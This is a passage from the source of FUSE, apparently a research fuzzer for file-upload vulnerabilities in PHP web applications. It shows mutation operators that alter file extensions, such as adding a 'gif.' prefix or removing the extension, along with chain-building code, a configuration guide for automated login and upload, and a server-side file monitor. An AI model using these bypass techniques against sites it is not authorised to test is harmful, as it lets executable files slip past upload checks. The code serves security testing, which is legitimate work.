 7 |   __exclusion_op__ = {'php':['M04_GIF','M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M04_GIF','M04_ACE','M04_ARC','M04_ARJ','M04_DFXP','M04_EPUB','M04_GIF','M04_GPX','M04_GZIP','M04_JPG','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_PNG','M04_WP','M04_WRI','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M7','M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M10', 'M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX','M08']}#['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12GIF'
19 | 
20 |       output['fileext'] = 'gif.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m07.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation 7: Remove extentsion"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 | 
 8 |   # XXX: Fill the exclusion operator and seed dependency
 9 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M07', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'html':['M12_HTML','M12_XHTML','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'xhtml':['M12_HTML','M12_XHTML','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06', 'M07', 'M08', 'M10', 'M11', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX'], 'js':['M12_HTML','M12_XHTML','M07','M12_GIF','M12_PNG','M12_JPG','M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB',  'M12_GPX', 'M12_GZIP', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZHP', 'M12_ZIPX', 'M10', 'M11']}
10 | #other ['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_PNG', 'M02_JPG', 'M02_GIF', 'M02_ZIP', 'M02_PDF', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT', 'M10','M06','M08'] # ([classname])when this op used for mutation,
11 | # php ['M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT']
12 |                         # operations in this list can be used to extra mutation.
13 |   __resource__ = {} # ({type:resource filename})
14 |   __seed_dependency__ = __exclusion_op__.keys()#['html', 'js'] # seed file dependency for operation
15 | 
16 |   def operation(self, output, seed_file, resource_file=None):
17 |       output['fileext'] = ''
18 |       if output['filename'] != None and len(output['filename']) > 0:
19 |         filename = output['filename']
20 |       else:
21 |         filename = utils.extract_filename(seed_file)
22 |       output['filename'] = filename + '_M7'
23 | 
24 | 
25 | 


--------------------------------------------------------------------------------
/configs/README.md:
--------------------------------------------------------------------------------
  1 | # Configuration File
  2 | * FUSE uses a user-provided [configuration file](default-credential.conf)
  3 | that specifies parameters for a target PHP application. The script must be
  4 | filled out before testing a target Web application.
  5 | 
  6 | ##### The [configuration file](default-credential.conf) requires the following fields:
  7 | 
  8 | ###### USER_CREDENTIAL
  9 | 1. `ID`: Username for the Web application under testing.
 10 | 1. `PW`: Password for the Web application under testing.
 11 | 1. `WebRootPath`: Root path for the Web server.
 12 | 1. `WebHost`: Host information for the WEb application under testing.
 13 | 1. `WebLoginIDName`: Username for the login page.
 14 | 1. `WebLoginPWName`: Password for the login page.
 15 | 1. `WebLoginURL`: The URL for the login processing page.
 16 | 1. `WebLoginPageURL`: The URL for the page where login form exists.
 17 | 1. `WebLoginCSRFName`: The name of CSRF parameter used in the login form.
 18 | 1. `WebLoginAdditionalValue`: Parameters name and value other than ID, PW, and CSRF.
 19 | 1. `WebLoginSuccessStr`: String to identify login success on page after login processing.
 20 | 1. `WebUploadURL`: The URL for the page that handles the upload request.
 21 | 1. `WebUploadPageURL`: The URL for the page where upload form exists.
 22 | 1. `WebUploadFormAttr`: Attribute for upload form (Optional).
 23 | 1. `WebUploadCSRFName`: The name for parameter of CSRF token used for upload.
 24 | 1. `WebUploadSuccessStr`: String to identify upload success.
 25 | 1. `WebUploadAdditionalValue`: Name and value of additional parameters used for upload.
 26 | 1. `WebUploadCustomHeader`: Header information used for upload.
 27 | 1. `WebUploadedFileUrlPattern`: File to be uploaded.
 28 | 1. `WebUploadFilesURL`: The URL for summary page of uploaded file.
 29 | 1. `WebUploadFilesParameter`: Additional parameters to access summary page of the uploaded file.
 30 | 
 31 | ###### DETECTOR_CONF
 32 | 
 33 | 1. `MutationChainLimit`: Maximum length of mutation chain.
 34 | 1. `MonitorEnable`: Whether to use File Monitor.
 35 | 1. `MonitorHost`: Host address for File Monitor.
 36 | 1. `MonitorPort`: Port for File Monitor.
 37 | 
 38 | * Custom Tag:
 39 | To support various applications, there are tags that can be used in specific parts of the configuration file. Different custom tags are available for each configuration attribute.
 40 | 
 41 | 
 42 | ```
 43 | WebLoginCSRFName
 44 | WebUploadCSRFName
 45 | 
 46 | %cookietoken#
 47 | => Get all name and value pairs of cookies and place them in this location.
 48 | 
 49 | %headertoken:html_tag@[Tag Type]=[Tag Name]=[Tag Value]=[Get Attr Name]=[Header Name]#
 50 | => In the UploadPage, search for a tag of the [Tag Type] type with the attribute name [Tag Name] and the value [Tag Value]. Among them, the value corresponding to [Get Attr Name] is added to the HTTP Request [Header Name] header.
 51 | 
 52 | %headertoken:html_regex@[Regex1]=[Regex2]=[Header Name]#
 53 | => Find the string corresponding to regular expression [Regex2] among the values retrieved by the [Regex1] from the UploadPage, and use it as the value of [Header Name] name in request header.
 54 | 
 55 | %headertoken:header@[headername]#
 56 | => Insert the [headername] header of the HTTP(S) response for UploadPage into the request header.
 57 | 
 58 | %reg:[Regex]#
 59 | => In UploadPage, find the tag whose name corresponds to the [Regex] regular expression, and use the tag as name and value pair.
 60 | 
 61 | ----
 62 | 
 63 | WebLoginPageURL
 64 | WebUploadPageURL
 65 | 
 66 | %randint#
 67 | => Place a random number at this location.
 68 | 
 69 | %cookie:[cookiename]#
 70 | => Place the value corresponding to [cookiename] of the cookie
 71 | 
 72 | %cookie:reg:[regex]#
 73 | => Place the value of the parameter whose name matches [regex] in the cookie.
 74 | 
 75 | ---
 76 | 
 77 | WebUploadURL
 78 | 
 79 | %find#
 80 | => Find upload form and use action value as upload URL.
 81 | 
 82 | ---
 83 | 
 84 | WebUploadAdditionalValue
 85 | 
 86 | %filename#
 87 | => Place the name of the upload file.
 88 | 
 89 | %filebinary#
 90 | => Place the content of the upload file.
 91 | 
 92 | %domtoken:[regex1]@[regex2]#
 93 | => Place the value corresponding to the regular expression [regex2] in this location among the values retrieved by the [regex1] from the UploadPageURL.
 94 | 
 95 | %randint#
 96 | => Place a random number at this location.
 97 | 
 98 | %cookie:[cookiename]#
 99 | => The value corresponding to [cookiename] of the cookie.
100 | 
101 | %cookie:reg:[regex]#
102 | => The value of the parameter whose name is matched with [regex] in the cookie.
103 | 
104 | ---
105 | 
106 | WebUploadedFileUrlPattern
107 | 
108 | %genfile#
109 | => Insert a regular expression for the filename generated by FUSE.
110 | 
111 | %filename#
112 | => Insert the file name you uploaded.
113 | ```
114 | 
115 | * Test to make sure your configuration is successfully working
116 | ```
117 | $ python ../tester/login_upload_test.py [config]
118 | 
119 | ```
120 | 
121 | 


--------------------------------------------------------------------------------
/tester/mutation_tester.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | import os
  3 | import re
  4 | import utils
  5 | 
  6 | class mutate_manager:
  7 |   __op_path__ = './mutation_op/'#'./mutation_op/not_implemented/'
  8 |   extension = lambda x: x.rsplit('.',1)[1]
  9 |   __seedList__ = map(extension,os.listdir('./seed/'))
 10 |   importor = lambda self,x : __import__(self.__op_path__[2:-1]+'.'+x.lower(),fromlist=["{}.{}".format(x,x)])
 11 |   file2class = lambda self,x : (x.split('.',1)[0]).upper()
 12 |   op_dict = {}
 13 | 
 14 |   def __init__(self):
 15 |     op_dir = os.listdir(self.__op_path__)
 16 |     ops = []
 17 |     class_re = re.compile(r'm\d+.*[.]py$')
 18 |     for i in op_dir:
 19 |       # File name should always match with m[Number].py
 20 |       if class_re.match(i):
 21 |         ops.append(i)
 22 |     ops = list(set(map(self.file2class,ops)))
 23 |     for i in ops:
 24 |       self.op_dict[i] = self.importor(i)
 25 | 
 26 |   def combinatedOpList(self,seedtype=None):
 27 |     opList = {}
 28 |     if seedtype==None:
 29 |       for i in self.__seedList__:
 30 |         opList[i] = self.combinatedOpListFactory(i)
 31 |     elif seedtype in self.__seedList__:
 32 |       opList[seedtype] = self.combinatedOpListFactory(seedtype)
 33 |     else:
 34 |       print "[-] Given seed type is not exist in seed list"
 35 |       return None
 36 | 
 37 |     return opList
 38 | 
 39 |   def combinatedOpListFactory(self,seedtype):
 40 |     #eqmaker = lambda x : ('+'.join(x))
 41 |     available_op = []
 42 |     oplist = []
 43 | 
 44 |     # find available op
 45 |     for i in self.op_dict.keys():
 46 |       if seedtype in self.op_dict[i].mOP.__seed_dependency__ and i != "M0":
 47 |         available_op.append([i])
 48 | 
 49 |     oplist += available_op # 1R - same with oplist, available_op
 50 | 
 51 |     # make list, 2R~
 52 |     for aop in available_op: #List(List(Str)) -> List(Str)
 53 |       round_templist = []
 54 |       for opl in oplist:
 55 |         banflag = False
 56 |         for banop in self.op_dict[aop[0]].mOP.__exclusion_op__: #List(List
 57 |           if banop in opl:
 58 |             banflag = True
 59 |             break
 60 |         if not banflag and aop[0] not in opl:
 61 |           append_op = []
 62 |           append_op += aop
 63 |           append_op += opl
 64 |         else:
 65 |           continue
 66 |         round_templist.append(append_op)
 67 |       map(list.sort,round_templist)
 68 | 
 69 |       oplist += round_templist
 70 |       oplist = map(tuple,oplist)
 71 |       oplist = map(list,set(oplist))
 72 |     #oplist.insert(0,['M0'])
 73 |     return oplist
 74 | 
 75 | 
 76 |   def testMutatedData(self, mutation, seed_files):
 77 | 
 78 |       mutator = self.op_dict[mutation].mOP()
 79 |       seed_dep = mutator.__seed_dependency__[0]
 80 |       resource_file = None
 81 | 
 82 |       for i in seed_files:
 83 |         if "." + seed_dep in i:
 84 |           seed_file = i
 85 |           break
 86 | 
 87 |       output = {
 88 |           'filename': utils.extract_filename(seed_file),
 89 |           'fileext': utils.extract_fileext(seed_file),
 90 |           'filetype': utils.extract_filetype(seed_file),
 91 |           'content': utils.extract_content(seed_file)
 92 |       }
 93 | 
 94 |       origin = {
 95 |           'filename': utils.extract_filename(seed_file),
 96 |           'fileext': utils.extract_fileext(seed_file),
 97 |           'filetype': utils.extract_filetype(seed_file),
 98 |           'content': utils.extract_content(seed_file)
 99 |       }
100 | 
101 |       mutator.operation(output, seed_file, resource_file)
102 | 
103 |       seed_type = seed_file.split(".")[-1]
104 |       write_content(seed_type, output)
105 |       """
106 |       if output['filename'] != origin['filename']:
107 |         print "[+] Mutation succeed ( {} ) - filename".format(mutation)
108 |         return True
109 |       el
110 |       """
111 |       if output['fileext'] != origin['fileext']:
112 |         print "[+] Mutation succeed ( {} ) - fileext( {} -> {} )".format(mutation,origin["fileext"], output["fileext"])
113 |         return True
114 |       elif output['filetype'] != origin['filetype']:
115 |         print "[+] Mutation succeed ( {} ) - filetype( {} -> {} )".format(mutation,origin["filetype"], output["filetype"])
116 |         return True
117 |       elif output['content'] != origin['content']:
118 |         print "[+] Mutation succeed ( {} ) - content( {} b -> {} b )".format(mutation,len(origin["content"]), len(output["content"]))
119 |       elif output['filename'][0] == '.':
120 |         print "[+] Mutation succeed ( {} ) - filename( {} -> {} )".format(mutation,origin["filename"], output["filename"])
121 | 
122 |         return True
123 | 
124 |       return False
125 | 
126 | 
127 | def write_content(seed_type, output):
128 |   if output['fileext'] == '':
129 |     full_file_name = output['filename']
130 |   else:
131 |     full_file_name = "%s.%s" % (output['filename'], output['fileext'])
132 | 
133 |   if seed_type != "php":
134 |     if not os.path.exists(seed_type):
135 |       os.makedirs(seed_type)
136 |     with open("%s/%s" % (seed_type, full_file_name), "w") as f:
137 |         f.write(output['content'])
138 | 
139 | def get_type_seed_files(types, seed_files):
140 |   type_seed_files = []
141 |   for i in seed_files:
142 |     # XXX: Maybe we can check file metadata, not use the file extension to
143 |     # check their type?
144 |     if "." + types in i:
145 |       type_seed_files.append(i)
146 |   return type_seed_files
147 | 
148 | # if you need to find full chain, use this code.
149 | if __name__ == '__main__':
150 |   test = mutate_manager()
151 | 
152 |   seed_files = os.listdir('./seed')
153 |   resource_files = os.listdir('./resource')
154 | 
155 |   seed_files = ['./seed/' + x for x in seed_files]
156 |   resource_files = ['./resource/' + x for x in resource_files]
157 |   print seed_files
158 |   test_op = test.op_dict.keys()
159 |   test_op.sort()
160 |   print test_op
161 |   for i in test_op:
162 |     test.testMutatedData(i,seed_files)
163 | 


--------------------------------------------------------------------------------
/filemutator.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | import os
  3 | import re
  4 | import utils
  5 | 
  6 | class mutate_manager:
  7 |   __op_path__ = './mutation_op/'
  8 |   extension = lambda x: x.rsplit('.',1)[1]
  9 |   __seedList__ = map(extension,os.listdir('./seed/'))
 10 |   importor = lambda self,x : __import__(self.__op_path__[2:-1]+'.'+x.lower(),fromlist=["{}.{}".format(x,x)])
 11 |   file2class = lambda self,x : (x.split('.',1)[0]).upper()
 12 |   op_dict = {}
 13 | 
 14 |   def __init__(self):
 15 |     op_dir = os.listdir(self.__op_path__)
 16 |     ops = []
 17 |     class_re = re.compile(r'm\d+.*[.]py$')
 18 |     for i in op_dir:
 19 |       # File name should always match with m[Number].py
 20 |       if class_re.match(i):
 21 |         ops.append(i)
 22 |     ops = list(set(map(self.file2class,ops)))
 23 |     for i in ops:
 24 |       self.op_dict[i] = self.importor(i)
 25 | 
 26 |   def mutation_op_list(self):
 27 |     dir_list = os.listdir(self.__op_path__)
 28 |     mutation_list = []
 29 |     for i in dir_list:
 30 |       if ".py" not in i or ".pyc" in i or "__init__" in i or "mutation" in i:
 31 |         pass
 32 |       else:
 33 |         mutation_list.append(i.upper().rsplit('.',1)[0])
 34 |     mutation_list.sort()
 35 |     return mutation_list
 36 | 
 37 |   def mutation_chain(self, base_chain, seed_type, success_list):
 38 |     mutation_list = self.mutation_op_list()
 39 |     if '+' in base_chain:
 40 |       last_op_idx = mutation_list.index(base_chain.rsplit('+',1)[-1])+1
 41 |       base_chain = base_chain.split('+')
 42 |     elif len(base_chain)<=0:
 43 |       last_op_idx = 0
 44 |       base_chain = []
 45 |     else:
 46 |       last_op_idx = mutation_list.index(base_chain)+1
 47 |       base_chain = [base_chain]
 48 | 
 49 |     op_range = mutation_list[last_op_idx:]
 50 |     ret = []
 51 |     base_chain_import = {}
 52 |     op_range_import = {}
 53 |     for i in base_chain:
 54 |       base_chain_import[i] = self.importor(i)
 55 |     for i in op_range:
 56 |       op_range_import[i] = self.importor(i)
 57 |     for i in op_range:
 58 |       excludedflag = True
 59 | 
 60 |       if seed_type not in op_range_import[i].mOP.__seed_dependency__:
 61 |         excludedflag = False
 62 |       else:
 63 |         for ele in base_chain_import.keys():
 64 |           if seed_type not in base_chain_import[ele].mOP.__exclusion_op__.keys():
 65 |             excludedflag = False
 66 |             break
 67 |           elif i in base_chain_import[ele].mOP.__exclusion_op__[seed_type]:
 68 |             excludedflag = False
 69 |             break
 70 |       if excludedflag:
 71 |         input_mutation = ('+'.join(base_chain)+"+{}".format(i))
 72 |         if input_mutation[0] == "+":
 73 |           ret.append(input_mutation[1:])
 74 |         else:
 75 |           ret.append(input_mutation)
 76 |     filtered_ret = []
 77 |     for i in ret:
 78 |       banflag = False
 79 |       for ban in success_list:
 80 |         if type(ban) == str and ban in i:
 81 |           banflag = True
 82 |           break
 83 |         elif type(ban) == list:
 84 |           hitcount = 0
 85 |           for ban_ele in ban:
 86 |             if ban_ele in i:
 87 |               hitcount += 1
 88 |           if hitcount == len(ban):
 89 |             banflag = True
 90 |             break
 91 |       if not banflag:
 92 |         filtered_ret.append(i)
 93 |     return filtered_ret
 94 | 
 95 | 
 96 |   def combinatedOpList(self,seedtype=None):
 97 |     opList = {}
 98 |     if seedtype==None:
 99 |       for i in self.__seedList__:
100 |         opList[i] = self.combinatedOpListFactory(i)
101 |     elif seedtype in self.__seedList__:
102 |       opList[seedtype] = self.combinatedOpListFactory(seedtype)
103 |     else:
104 |       print "[-] Given seed type is not exist in seed list"
105 |       return None
106 | 
107 |     return opList
108 | 
109 |   def combinatedOpListFactory(self,seedtype):
110 |     available_op = []
111 |     oplist = []
112 | 
113 |     # find available op
114 |     for i in self.op_dict.keys():
115 |       if seedtype in self.op_dict[i].mOP.__seed_dependency__ and i != "M0":
116 |         available_op.append([i])
117 | 
118 |     oplist += available_op # 1R - same with oplist, available_op
119 | 
120 |     # make list, 2R~
121 |     for aop in available_op: #List(List(Str)) -> List(Str)
122 |       round_templist = []
123 |       for opl in oplist:
124 |         banflag = False
125 |         for banop in self.op_dict[aop[0]].mOP.__exclusion_op__[seedtype]: #List(List
126 |           if banop in opl:
127 |             banflag = True
128 |             break
129 |         if not banflag and aop[0] not in opl:
130 |           append_op = []
131 |           append_op += aop
132 |           append_op += opl
133 |         else:
134 |           continue
135 |         round_templist.append(append_op)
136 |       map(list.sort,round_templist)
137 | 
138 |       oplist += round_templist
139 |       oplist = map(tuple,oplist)
140 |       oplist = map(list,set(oplist))
141 |     return oplist
142 | 
143 |   def makeMutatedData(self, mutate_list, seed_file, resource_file):
144 |       output = {
145 |           'filename': utils.extract_filename(seed_file),
146 |           'fileext': utils.extract_fileext(seed_file),
147 |           'filetype': utils.extract_filetype(seed_file),
148 |           'content': utils.extract_content(seed_file)
149 |       }
150 | 
151 | 
152 |       # insert specific data for hash
153 |       output['content'] = output['content'].replace("%unique#",os.urandom(8).encode('hex'))
154 | 
155 | 
156 |       for mutation in mutate_list:
157 |           mutator = self.op_dict[mutation].mOP()
158 |           mutator.operation(output, seed_file,resource_file)
159 |        # XXX: Finally, use output variable to make request
160 | 
161 |       return output
162 | 
163 | def get_type_seed_files(types, seed_files):
164 |   type_seed_files = []
165 |   for i in seed_files:
166 |     # XXX: Maybe we can check file metadata, not use the file extension to
167 |     # check their type?
168 |     if "." + types in i:
169 |       type_seed_files.append(i)
170 |   return type_seed_files
171 | 
172 | # if you need to find full chain, use this code.
173 | if __name__ == '__main__':
174 |   test = mutate_manager()
175 |   OpList = test.combinatedOpList()
176 | 
177 |   seed_files = os.listdir('seed')
178 |   resource_files = os.listdir('resource')
179 | 
180 |   seed_files = ['seed/' + x for x in seed_files]
181 |   resource_files = ['resource/' + x for x in resource_files]
182 | 
183 |   count = 0
184 |   for key in OpList.keys():
185 |     type_seed_files = get_type_seed_files(key, seed_files)
186 |     print "{} - {}".format(key,len(OpList[key]))
187 | 


--------------------------------------------------------------------------------
/filemonitor.py:
--------------------------------------------------------------------------------
  1 | import pyinotify
  2 | import json
  3 | import socket
  4 | import threading
  5 | import atexit
  6 | import time
  7 | import hashlib
  8 | import os
  9 | 
 10 | MONITOR_PATH='/var/www/html/'
 11 | MONITOR_PORT=20174           # Default value for test
 12 | EVENT_LIST_LIMITATION=8000
 13 | EVENT_LIST = []
 14 | 
 15 | #Debug = True
 16 | Debug = False
 17 | 
 18 | # Todo - Daemonize communication module
 19 | 
 20 | class FileEventHandler(pyinotify.ProcessEvent):
 21 |   def __init__(self):
 22 |     self.mutex = threading.Lock()
 23 | 
 24 |   def process_IN_ATTRIB(self,event):
 25 |     if Debug:
 26 |       print "[IN_ATTRIB] {}".format(event.pathname)
 27 |     self.mutex.acquire()
 28 |     if len(EVENT_LIST)>=EVENT_LIST_LIMITATION:
 29 |       for i in range(0,len(EVENT_LIST)-EVENT_LIST_LIMITATION+1):
 30 |         EVENT_LIST.remove(EVENT_LIST[0])
 31 |       if Debug:
 32 |         print "[!] EVENT_LIST Removed - {}".format(len(EVENT_LIST))
 33 |     if os.path.isdir(event.pathname):
 34 |       pass
 35 |     else:
 36 |       try:
 37 |         with open(event.pathname, 'r') as fp:
 38 |           binary = fp.read()
 39 |           #print binary
 40 |           tmpList = [event.pathname,hashlib.md5(binary).hexdigest()]
 41 |         if tmpList not in EVENT_LIST and os.path.isfile(event.pathname):
 42 |           EVENT_LIST.append([event.pathname,hashlib.md5(binary).hexdigest()])
 43 |           #EVENT_LIST.append([event.pathname,hashlib.md5(binary).hexdigest()])
 44 |         if Debug:
 45 |           print "[!] Appended - ({}){}".format(hashlib.md5(binary).hexdigest(),event.pathname)
 46 |       except:
 47 |         pass
 48 |     self.mutex.release()
 49 | 
 50 |   def process_IN_CREATE(self,event):
 51 |     self.mutex.acquire()
 52 |     if Debug:
 53 |       print "[IN_CREATE] {}".format(event.pathname)
 54 |     if len(EVENT_LIST)>=EVENT_LIST_LIMITATION:
